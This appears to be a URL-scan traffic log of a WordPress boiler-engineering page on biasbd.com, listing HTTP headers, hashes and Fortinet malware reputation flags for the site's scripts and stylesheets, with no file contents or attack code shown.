                                         111.221.45.32
HTTP/1.1 200 OK
content-type: text/css
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:38 GMT
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "94b-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 793
date: Tue, 27 Sep 2022 06:18:38 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   793
Md5:    cbddcd7411ec657b25b64941f09fa381
Sha1:   92d262c5ce23b31af4b21785b5736c8b486822f5
Sha256: 3de374e42ef63fd1f8b60c29837b469cdc69b72722c7ee6db24c39e39101e8eb
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 3019
Cache-Control: 'max-age=158059'
Date: Tue, 27 Sep 2022 06:18:38 GMT
Last-Modified: Tue, 27 Sep 2022 05:28:19 GMT
Server: ECS (ska/F712)
X-Cache: HIT
Content-Length: 471

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "D1CC189268326D8AFDB8799C7BE2F4FB11650FC31398252327C059D7F5D3877B"
Last-Modified: Sun, 25 Sep 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=11533
Expires: Tue, 27 Sep 2022 09:30:52 GMT
Date: Tue, 27 Sep 2022 06:18:39 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "D1CC189268326D8AFDB8799C7BE2F4FB11650FC31398252327C059D7F5D3877B"
Last-Modified: Sun, 25 Sep 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=11533
Expires: Tue, 27 Sep 2022 09:30:52 GMT
Date: Tue, 27 Sep 2022 06:18:39 GMT
Connection: keep-alive

                                        
                                            GET /wp-content/themes/industrial/css/swipebox.css?ver=5.2.16 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: text/css
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:38 GMT
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "166e-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 1348
date: Tue, 27 Sep 2022 06:18:38 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   1348
Md5:    b21af63ea6bb174588218500e41938e6
Sha1:   fea019b73568ba3703a0abdb06bd0a4bb618c514
Sha256: 873eb93a3568e7207e74c019cbc3c18e35296c71a668d2dd7662dbc783617200
                                        
                                            GET /wp-content/themes/industrial/style.css?ver=5.2.16 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: text/css
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:39 GMT
last-modified: Sat, 09 Feb 2019 12:25:42 GMT
etag: "2c8-5c5ec6c6-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 411
date: Tue, 27 Sep 2022 06:18:39 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text
Size:   411
Md5:    78fa704491160bf404d3e20ececf6c26
Sha1:   0342cc9218380f9fb1bdecffbe28a3e791719a99
Sha256: b86a1df6ce235bf21a85d0181b439a0f1f1013a31973af4539e415c89941f260

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/industrial/css/wordpress.css?ver=5.2.16 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: text/css
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:39 GMT
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "80b-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 696
date: Tue, 27 Sep 2022 06:18:39 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   696
Md5:    023fbdc82c706162832c4db9b00ffab4
Sha1:   c391c45fb0fd7b3dd9e6fbab0e411c2b3c114de9
Sha256: 3512649c5fba98039b175b1ede193ddc41431590327b48b2e4bc7b55280756ac

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/industrial/css/components.css?ver=5.2.16 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: text/css
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:38 GMT
last-modified: Wed, 02 Jan 2019 21:39:26 GMT
etag: "19d14-5c2d2f8e-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 17786
date: Tue, 27 Sep 2022 06:18:38 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text
Size:   17786
Md5:    5c0c03646926e8ffa054ab548aabb2ad
Sha1:   a5a3d88f1af1ecd6f9ba1ae1a65c7acf1fca46b9
Sha256: 38b1cccc333d316012486e6a3390ffb3e3fff956d3d3e5cff1716367a3be1610

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/industrial/custom.css?ver=5.2.16 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: text/css
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:39 GMT
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "28-56dd2758-0;;;"
accept-ranges: bytes
content-length: 40
date: Tue, 27 Sep 2022 06:18:39 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   40
Md5:    0df009c205c6595dfa2bd6df220bb49b
Sha1:   9f084f34dda0169577b05c49521e691a1022214a
Sha256: 38e2a843ebc496d80f59e180c384b804bd3034d228b3f1b09dfe7e3e11b2767a
                                        
                                            GET /wp-content/plugins/newsletter/style.css?ver=6.1.0 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: text/css
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:39 GMT
last-modified: Mon, 01 Jul 2019 18:27:56 GMT
etag: "18c8-5d1a50ac-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 1193
date: Tue, 27 Sep 2022 06:18:39 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text
Size:   1193
Md5:    eaa017c0514d60af9ba7281e692af7e3
Sha1:   d781a66d9945b12555d2d78ce462a582aaeddb9b
Sha256: ce6b5e769b94fa9caaef9a1822c0401aa66de94af1a76ea55621fe3650283fe5
                                        
                                            GET / HTTP/1.1 
Host: push.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: yeLCOZNw7YfEu21wBXKvGA==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

                                         
                                         52.43.253.52
HTTP/1.1 101 Switching Protocols
                                        
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: Dexn1Z3ossRSDM70gB6BeYIWrXg=

                                        
                                            GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: application/x-javascript
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:39 GMT
last-modified: Fri, 20 May 2016 04:11:28 GMT
etag: "2748-573e8e70-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 4034
date: Tue, 27 Sep 2022 06:18:39 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text, with very long lines (9959)
Size:   4034
Md5:    2f89b08855471c7476435ce0bec33ba7
Sha1:   970533f152623df03b5fc6fb793b21889e4e0349
Sha256: d200586b6dd1ff779b6c30947361ff736e076d8c7d502505ab3174ca33455ea0

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: application/x-javascript
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:39 GMT
last-modified: Tue, 25 Dec 2018 05:42:46 GMT
etag: "fdb5-5c21c356-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 18107
date: Tue, 27 Sep 2022 06:18:39 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text, with very long lines (64614), with CRLF line terminators
Size:   18107
Md5:    d4063405bdeedf677d13c9ce7b535aa1
Sha1:   256f3aed2dfad47a4f42e45356fd9aedb7be1f31
Sha256: d31e0030358c9ee54256451fd2055125da1d7bd58da7b1ea901aacfe25b84696
                                        
                                            GET /wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: application/x-javascript
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:39 GMT
last-modified: Thu, 10 Mar 2022 19:31:33 GMT
etag: "255e-622a5215-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 3533
date: Tue, 27 Sep 2022 06:18:39 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text, with very long lines (9172)
Size:   3533
Md5:    de329cdce96c17fef9c3516b09ba51c6
Sha1:   664ff401060faaf6770ba30761b367d3aef10a8a
Sha256: d9f05937cd228acc98f18a5e52ef966e0885afbcbc06d31da2e61e2b3f9e13f4

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=3.6.7 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: application/x-javascript
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:39 GMT
last-modified: Thu, 10 Mar 2022 19:31:30 GMT
etag: "a4d-622a5212-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 954
date: Tue, 27 Sep 2022 06:18:39 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  HTML document, ASCII text, with very long lines (2637), with no line terminators
Size:   954
Md5:    e9992160668c7b30e45faf568c416f25
Sha1:   c004dc1d1a4868d6178aa1baac98711ee09c49e5
Sha256: 26ff0f8d7f14ce31d82a41909407ebf2eb0f104f113a5e01892f159e6666bc97

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/uploads/Cochran-Fire-Tube-Boiler.jpg HTTP/1.1 
Host: www.elprocus.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         206.189.131.248
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
date: Tue, 27 Sep 2022 06:18:39 GMT
content-length: 8931
last-modified: Thu, 13 Dec 2018 06:54:51 GMT
etag: "5c12023b-22e3"
expires: Thu, 31 Dec 2037 23:55:55 GMT
cache-control: max-age=315360000
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 190x265, components 3\012- data
Size:   8931
Md5:    9c9e2b87c3f181c6f28edfdbf67e2a66
Sha1:   61d092a485a6f8616e66183d89d2ffac883ce3a1
Sha256: 43db794fef1a4267b973de8e425c56c5f48451d9d2c05c2592d9afc5c3269575
                                        
                                            GET /wp-includes/js/jquery/jquery.js?ver=1.12.4-wp HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: application/x-javascript
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:39 GMT
last-modified: Wed, 22 May 2019 05:39:24 GMT
etag: "17a69-5ce4e08c-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 33836
date: Tue, 27 Sep 2022 06:18:39 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text, with very long lines (31997)
Size:   33836
Md5:    167b4b3aef1415384a1d72a851584464
Sha1:   7edb972190b2048300fb5eb1668e54ec049b91a2
Sha256: 2d29b6f8700dbeda5b83991887d89ef850f3d570946b8eef360a86b9adcb0fb3

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.8 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: application/x-javascript
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:39 GMT
last-modified: Tue, 25 Dec 2018 05:42:46 GMT
etag: "1afe4-5c21c356-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 38593
date: Tue, 27 Sep 2022 06:18:39 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text, with very long lines (27287), with CRLF line terminators
Size:   38593
Md5:    da82b93940d18779f96809b863a9f975
Sha1:   a0a731146a6a1a908b24ad04f3c2529dc81d9914
Sha256: ca73520757002c8e415668ecef09cfca42ac2f8ad6a48d243959a9850855ac55

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/js_composer/assets/js/vendors/woocommerce-add-to-cart.js?ver=5.5 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: application/x-javascript
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:39 GMT
last-modified: Tue, 25 Dec 2018 05:41:34 GMT
etag: "37f-5c21c30e-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 355
date: Tue, 27 Sep 2022 06:18:39 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text
Size:   355
Md5:    b52dacb498e0baf0cac56cfc1137b634
Sha1:   04b880bf015577604ce2dcc19b9fc0e2c221b31f
Sha256: 884f610a43fadf231d67a53f3c406e0d753366f6e61588f05da6d2f361c6e5fd
                                        
                                            GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.3 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: text/css
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:39 GMT
last-modified: Mon, 01 Jul 2019 18:27:38 GMT
etag: "695-5d1a509a-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 657
date: Tue, 27 Sep 2022 06:18:39 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text
Size:   657
Md5:    05693f8e3634eaa294f415f241b633b6
Sha1:   8136e661102dfe848f2ce6bf384b9aba8e2829cc
Sha256: 550c7691a7e68e174472d3b68b3b147e40cdfe90335e9cd441cffeece9f9dfc4
                                        
                                            GET /wp-content/plugins/woocommerce/assets/css/blocks/style.css?ver=3.6.7 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: text/css
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:39 GMT
last-modified: Thu, 10 Mar 2022 19:31:35 GMT
etag: "18da-622a5217-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 924
date: Tue, 27 Sep 2022 06:18:39 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text, with very long lines (4166)
Size:   924
Md5:    35d69fda83362d1bb1fd562889dbafec
Sha1:   e6e85c0c5618044b338a7f0cc1770e79142619b4
Sha256: 9478b7e8de8615eb26bff7009d774649817b69736b047b7e654e645a0927d18d

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.8 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: text/css
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:39 GMT
last-modified: Tue, 25 Dec 2018 05:42:44 GMT
etag: "9b46-5c21c354-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 9570
date: Tue, 27 Sep 2022 06:18:39 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (5178), with CRLF line terminators
Size:   9570
Md5:    4e1237e14f7156c3761b3aad4eb0fa0e
Sha1:   1a331f7be9045dbb71665b750124c9b59af89091
Sha256: cedbb7e59f35b504f399b64b12652caadc94d7ea303ffab1f0fa7a46874f20e4

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/uploads/Scotch-Marine-Fire-Tube-Boiler.jpg HTTP/1.1 
Host: www.elprocus.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         206.189.131.248
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
date: Tue, 27 Sep 2022 06:18:39 GMT
content-length: 8287
last-modified: Thu, 13 Dec 2018 06:56:27 GMT
etag: "5c12029b-205f"
expires: Thu, 31 Dec 2037 23:55:55 GMT
cache-control: max-age=315360000
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 259x194, components 3\012- data
Size:   8287
Md5:    dcb12edd28692a11fcac79cf006c5108
Sha1:   8500df962c1d966be7d2c1c5fe7dcdb0117466b0
Sha256: 0355ffabc96e8faa3e2a97533097687953f6a4b1e3b6206c0753454aa9d6fd8f
                                        
                                            GET /wp-content/uploads/Cornish-Fire-Tube-Boiler-300x225.jpg HTTP/1.1 
Host: www.elprocus.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         206.189.131.248
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
date: Tue, 27 Sep 2022 06:18:39 GMT
content-length: 21857
last-modified: Thu, 13 Dec 2018 06:52:09 GMT
etag: "5c120199-5561"
expires: Thu, 31 Dec 2037 23:55:55 GMT
cache-control: max-age=315360000
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82", baseline, precision 8, 300x225, components 3\012- data
Size:   21857
Md5:    b49fb190ccf0d310cda820401d66e672
Sha1:   a1555339785694a535d98c6294c953c115893a89
Sha256: 29271e7325f002ed0f152db1edcf32ca91ea4e757abe55691ed93acf6c276213
                                        
                                            GET /wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css?ver=5.5 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: text/css
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:39 GMT
last-modified: Tue, 25 Dec 2018 05:41:36 GMT
etag: "7793-5c21c310-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 6913
date: Tue, 27 Sep 2022 06:18:39 GMT
server: LiteSpeed
